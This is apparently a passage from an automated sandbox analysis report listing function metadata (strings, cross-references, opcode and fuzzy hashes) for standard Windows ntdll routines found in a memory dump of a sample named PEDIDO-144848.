                                                        • GlobalizationUserSettings, xrefs: 36CDB3B4
                                                        • TargetNtPath, xrefs: 36CDB3AF
                                                        • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 36CDB3AA
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                        • API String ID: 0-505981995
                                                        • Opcode ID: 7a2d91c1d2b213137cd186b8777100f6829ce87fbc650ea600226305dd80f12d
                                                        • Instruction ID: 5de2e488c4dfb3e6fa81a1a230cdc832568d51bf69622037c191f32790cdf80c
                                                        • Opcode Fuzzy Hash: 7a2d91c1d2b213137cd186b8777100f6829ce87fbc650ea600226305dd80f12d
                                                        • Instruction Fuzzy Hash: 9F6160B2D41629AFDB21DF55DC88BD9B7B8EB04710F4101E9EA08AB250DB74DE84CF90
                                                        Function 36BFF75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • HEAP: , xrefs: 36C5E442
                                                        • HEAP[%wZ]: , xrefs: 36C5E435
                                                        • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 36C5E455
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                        • API String ID: 0-1340214556
                                                        • Opcode ID: 2a7bf783c3414650c3d95ec6f68a1152d5164e0240174acddef7eadb5fd01508
                                                        • Instruction ID: fcc9f17a175c646e69bb5f9bf4d25808833e8f7ba36f6388351fc616b3a5f068
                                                        • Opcode Fuzzy Hash: 2a7bf783c3414650c3d95ec6f68a1152d5164e0240174acddef7eadb5fd01508
                                                        • Instruction Fuzzy Hash: BB510435A14B94EFE712CBA5CC84F5ABBF8EF08344F0440A4E650CB662D775E908CB55
                                                        Function 36C21514 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • Could not validate the crypto signature for DLL %wZ, xrefs: 36C6A396
                                                        • LdrpCompleteMapModule, xrefs: 36C6A39D
                                                        • minkernel\ntdll\ldrmap.c, xrefs: 36C6A3A7
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                        • API String ID: 0-1676968949
                                                        • Opcode ID: 3fb89e8c9d9a7bdc989857fa481fbaae0859e1143a8b342e38266d6238919b7d
                                                        • Instruction ID: c080c9b100e4a0dc0299425a2f55b6bdb11712da60207362cd2520d149055f07
                                                        • Opcode Fuzzy Hash: 3fb89e8c9d9a7bdc989857fa481fbaae0859e1143a8b342e38266d6238919b7d
                                                        • Instruction Fuzzy Hash: BF51F374B04B459FFB11CB9AC984B197BE5AF00758F1402B8EE52DBAD1DBB4E900CB85
                                                        Function 36CAD62C Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • HEAP: , xrefs: 36CAD79F
                                                        • HEAP[%wZ]: , xrefs: 36CAD792
                                                        • Heap block at %p modified at %p past requested size of %Ix, xrefs: 36CAD7B2
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                        • API String ID: 0-3815128232
                                                        • Opcode ID: 0b67783e0d06ae19d213cdb284bdf172b8e675e5b39c93c73283d0cea9726dc0
                                                        • Instruction ID: 9fee506c6d63616213d8578c9f61ab54ac4e9ef4895c891619e205c8d0ce234d
                                                        • Opcode Fuzzy Hash: 0b67783e0d06ae19d213cdb284bdf172b8e675e5b39c93c73283d0cea9726dc0
                                                        • Instruction Fuzzy Hash: 7C5103795103628AF358CE2BC86477277F1DF45288F508C8EE4C5CB299DA26F846DBA1
                                                        Function 36BF753F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                        • API String ID: 0-1151232445
                                                        • Opcode ID: f9f2fd597c729dacfe614f5b2c67817053dd8ee626784a3beed5f12ea6ea1244
                                                        • Instruction ID: d9618d4b84d74e76978d25c4328c9d9b54eece1939faba6aa9fe14d2db2633f7
                                                        • Opcode Fuzzy Hash: f9f2fd597c729dacfe614f5b2c67817053dd8ee626784a3beed5f12ea6ea1244
                                                        • Instruction Fuzzy Hash: 73416878A203508FFB14DE5BD888BA577A0DF01348F6140FDEA458F662CAB6D449CF61
                                                        Function 36C315EF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • LdrpAllocateTls, xrefs: 36C7194A
                                                        • minkernel\ntdll\ldrtls.c, xrefs: 36C71954
                                                        • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 36C71943
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                        • API String ID: 0-4274184382
                                                        • Opcode ID: aa318df222411596c30788fea68c3216e27930dcad4555de2142daadd429c5ca
                                                        • Instruction ID: 488c818b0e8fa265d643c80a70b3535cb7c29eca5bf51789eb7af133378ec6b3
                                                        • Opcode Fuzzy Hash: aa318df222411596c30788fea68c3216e27930dcad4555de2142daadd429c5ca
                                                        • Instruction Fuzzy Hash: C7417AB5A01604AFDB14CFA9CD41AADBFB5FF48300F554129E506AB741DB35E801CFA0
                                                        Function 36C332C0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • Actx , xrefs: 36C332CC
                                                        • SXS: %s() passed the empty activation context data, xrefs: 36C72808
                                                        • RtlCreateActivationContext, xrefs: 36C72803
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                        • API String ID: 0-859632880
                                                        • Opcode ID: 1d809ec2dba95609d3bc23f39a6a737b7a191775451df1d2f3e65ad0cf231f99
                                                        • Instruction ID: 427e20eafc6f7e2ab8b89db811a568247b371758a192dc8827b3a103e39031be
                                                        • Opcode Fuzzy Hash: 1d809ec2dba95609d3bc23f39a6a737b7a191775451df1d2f3e65ad0cf231f99
                                                        • Instruction Fuzzy Hash: 79310E73A016459FEB06CE1AD890B9A37A4EF44714F248469EC08DF282CB7AD806CBD0
                                                        Function 36C8B214 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 36C8B2B2
                                                        • @, xrefs: 36C8B2F0
                                                        • GlobalFlag, xrefs: 36C8B30F
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                        • API String ID: 0-4192008846
                                                        • Opcode ID: 326d9d2cf7458566f112234fce08971fce5f81428238281871306be260e91f10
                                                        • Instruction ID: 6409485a72e03ae37ab08a175e8176b14ba76364cc80a0995e767d56b2b5d0d5
                                                        • Opcode Fuzzy Hash: 326d9d2cf7458566f112234fce08971fce5f81428238281871306be260e91f10
                                                        • Instruction Fuzzy Hash: B6316DB1D00609AFDB11EF95DC80AEEBBBCEF44748F400469EA15E7241EB349E44CBA4
                                                        Function 36C31527 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • DLL "%wZ" has TLS information at %p, xrefs: 36C7184A
                                                        • minkernel\ntdll\ldrtls.c, xrefs: 36C7185B
                                                        • LdrpInitializeTls, xrefs: 36C71851
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                        • API String ID: 0-931879808
                                                        • Opcode ID: 59b34f7dceb2da20b184f25cb1c29f98bbdb08596cfb183e9b6027e833cafe2d
                                                        • Instruction ID: 12949739c40dfa7fe8f2ee0a6f6d645da0333e4661d5bbedb7e1be3a0f25ed79
                                                        • Opcode Fuzzy Hash: 59b34f7dceb2da20b184f25cb1c29f98bbdb08596cfb183e9b6027e833cafe2d
                                                        • Instruction Fuzzy Hash: 9A31E4B1A11600AFE7109B55CD41B5A7FA9EF54394F620119E702FB681DB78ED41CBA0
                                                        Function 36C885AA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 36C885DE
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                        • API String ID: 0-702105204
                                                        • Opcode ID: 3616c129e140a3fc5409a6da5610a00f43f2282a1da5f4b5e68c9591dd5077c5
                                                        • Instruction ID: 481502186326557a805e5b8f99807ea535f3dc821362bf5a46ae05fe5e740ef7
                                                        • Opcode Fuzzy Hash: 3616c129e140a3fc5409a6da5610a00f43f2282a1da5f4b5e68c9591dd5077c5
                                                        • Instruction Fuzzy Hash: 0F017B795217005BE6305F169C48E867F66FF0035CF80056CE601DB953CB22E881CFA5
                                                        Function 36C151C0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$@
                                                        • API String ID: 0-149943524
                                                        • Opcode ID: 1dc540333f25f468099750190ecc9a46fb81650d7b8ea7f06129bb8dc1c278b4
                                                        • Instruction ID: 061c3ab98d04392144f051dbc5fb2ed6ba29805b80b5c0bd25d487668da03bb6
                                                        • Opcode Fuzzy Hash: 1dc540333f25f468099750190ecc9a46fb81650d7b8ea7f06129bb8dc1c278b4
                                                        • Instruction Fuzzy Hash: 94329CB49083218BE724CF16C480B2EB7E1EF88748F94492EF995C7391E734D955EB92
                                                        Function 36C05622 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID:
                                                        • API String ID: 3446177414-0
                                                        • Opcode ID: 6d0c15ccc0338ef64156c835fc2641671d173c6314136ef9734624856ba69ca3
                                                        • Instruction ID: 2048905b9aba1f4300f52342873b2cc632e1e6cd44dcb7efe39b1088fecbc18f
                                                        • Opcode Fuzzy Hash: 6d0c15ccc0338ef64156c835fc2641671d173c6314136ef9734624856ba69ca3
                                                        • Instruction Fuzzy Hash: 8831ED30601B12AFEB059B22CE80A8AFB69FF84758F444129E900D7B50DB70E821CFD1
                                                        Function 36C7E372 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: Legacy$UEFI
                                                        • API String ID: 2994545307-634100481
                                                        • Opcode ID: 79bc350da2f24384b7963f6e7dc673d7d2aa374b0e8a96d09bb4a5500039a0cc
                                                        • Instruction ID: cc462a53571c551412a9d553980c09912469389729dcecfb865726f56b893da1
                                                        • Opcode Fuzzy Hash: 79bc350da2f24384b7963f6e7dc673d7d2aa374b0e8a96d09bb4a5500039a0cc
                                                        • Instruction Fuzzy Hash: 1A615CB2E007189FEB15DFA9D840AADBBB9FF48744F50446EE649EB251EB30D940CB50
                                                        Function 36CDB55F Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • RedirectedKey, xrefs: 36CDB60E
                                                        • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 36CDB5C4
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                        • API String ID: 0-1388552009
                                                        • Opcode ID: e5a0645267135342e65a15816b04aada470d8a1692d9b0bbf095c7eaf827938a
                                                        • Instruction ID: 86fd15553a45f03faf9e36d39942158079d13999285343ae4145781db58aadd7
                                                        • Opcode Fuzzy Hash: e5a0645267135342e65a15816b04aada470d8a1692d9b0bbf095c7eaf827938a
                                                        • Instruction Fuzzy Hash: AC61F6B5C00219EFDF11DF95C848ADEBBB9FB08714F51406AEA05EB240DB359A46CFA0
                                                        Function 36C1F640 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: $$$
                                                        • API String ID: 3446177414-233714265
                                                        • Opcode ID: 8024b576dd881e1c82fcf0f064957e31eaf9647ecd980bab5c73f61f68feffc6
                                                        • Instruction ID: 32efd7357c876211318d7b998b864065261ad0ea5d0f564d7c49887ffe43f009
                                                        • Opcode Fuzzy Hash: 8024b576dd881e1c82fcf0f064957e31eaf9647ecd980bab5c73f61f68feffc6
                                                        • Instruction Fuzzy Hash: 6261CF75E00B49CBEB20DFA5C980B9DB7F1BF44308F10446ED625AB752CB74A941EB91
                                                        Function 36C333D0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • RtlpInitializeAssemblyStorageMap, xrefs: 36C7289A
                                                        • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 36C7289F
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                        • API String ID: 0-2653619699
                                                        • Opcode ID: 62ebf393853d5d9890652b6d0940ba9f1d0f2afea75ed4bd69ded7d3a8cdef6c
                                                        • Instruction ID: ac58f85a9448e50cff31b2c9cd1eb4a60726c2186e0dec1cc20ee7276d821aab
                                                        • Opcode Fuzzy Hash: 62ebf393853d5d9890652b6d0940ba9f1d0f2afea75ed4bd69ded7d3a8cdef6c
                                                        • Instruction Fuzzy Hash: 411102B2F05314AFF7158B4A9D40F5A7AA8DF88754F24802EB908EB244DA7ECD00D7E5
                                                        Function 36C3A4F0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: Cleanup Group$Threadpool!
                                                        • API String ID: 2994545307-4008356553
                                                        • Opcode ID: 0231d9b2472f93006626779f1b0ab4b32aa2cdd205444c404a31a604ed4f0e03
                                                        • Instruction ID: 01b5f8cb997ea9d767555a297304502ba71f4e0c56b3946b7655d3525d3790c3
                                                        • Opcode Fuzzy Hash: 0231d9b2472f93006626779f1b0ab4b32aa2cdd205444c404a31a604ed4f0e03
                                                        • Instruction Fuzzy Hash: F101D1B2116B40AFE311DF54CD05B1277E8EB40715F008979B658CB5A0E778D914CB46
                                                        Function 36C0C6E0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: MUI
                                                        • API String ID: 0-1339004836
                                                        • Opcode ID: ffde8dc7317a52c5de00f6be5d5980c9d28568070a8a825a8504b73f0ef6c2e4
                                                        • Instruction ID: 97ad112f18174d2e4cff6e98b0af58479603831bcfba619adbe4b8131d98f7ac
                                                        • Opcode Fuzzy Hash: ffde8dc7317a52c5de00f6be5d5980c9d28568070a8a825a8504b73f0ef6c2e4
                                                        • Instruction Fuzzy Hash: FB822979E003189BEB14CFAAC890B9DB7B1BF49754F608169E859EB250DB30ED85CF50
                                                        Function 36C064F0 Relevance: 1.9, APIs: 1, Instructions: 383COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e2a91e3682d032cf2e818ac9138eec8668e4774e11564f64598f2eab04112c21
                                                        • Instruction ID: e5e106464cfa642eb8f0e94a12e9c27b9c4e37fd304c009034f391948dbee77b
                                                        • Opcode Fuzzy Hash: e2a91e3682d032cf2e818ac9138eec8668e4774e11564f64598f2eab04112c21
                                                        • Instruction Fuzzy Hash: A9E17974A083418FD304CF2AC490A5ABBE0FF89358F148A6DE589DB351DB31E956CF92
                                                        Function 36C2E507 Relevance: 1.8, APIs: 1, Instructions: 278COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 37139d0ff027a65f2396e592068cc45f89b7c883b9b5634520249fe11718cfd8
                                                        • Instruction ID: 1fe44275d7c3136389578b6613fb3580b7584bcd86683b4ae33a93ceb0529196
                                                        • Opcode Fuzzy Hash: 37139d0ff027a65f2396e592068cc45f89b7c883b9b5634520249fe11718cfd8
                                                        • Instruction Fuzzy Hash: B4A1F371E007289FEB11CBA6C884B9D77A6EF08758F150169EA20FB291D7749D40CBD5
                                                        Function 36C0754C Relevance: 1.8, APIs: 1, Instructions: 277COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0568396004e94bfe9b9200df88c13a626471f3acd6b5c0c25a225c259fff56e0
                                                        • Instruction ID: 202c8f055f2be55435e03aeabf9783c65d4021adce7b3ebb7b6ff74928b9a0ae
                                                        • Opcode Fuzzy Hash: 0568396004e94bfe9b9200df88c13a626471f3acd6b5c0c25a225c259fff56e0
                                                        • Instruction Fuzzy Hash: 6BB11679A006029FE709CF69C484A99FBA6FF88344F2585AED519DB311DB30E941CFA0
                                                        Function 36C01051 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID:
                                                        • API String ID: 3446177414-0
                                                        • Opcode ID: 65d2e8bfc08cf2fe998ac149362dd73db5488684203edda7c26cc67e065c073b
                                                        • Instruction ID: 20fa36c8ecfeacbd40ca800cac3ba1ebe0438bbb7d6c1c4258616ea836c90b16
                                                        • Opcode Fuzzy Hash: 65d2e8bfc08cf2fe998ac149362dd73db5488684203edda7c26cc67e065c073b
                                                        • Instruction Fuzzy Hash: 87B101B59093808FE355CF29C880A5AFBF1BB88304F54496EE999C7352D731E845CF86
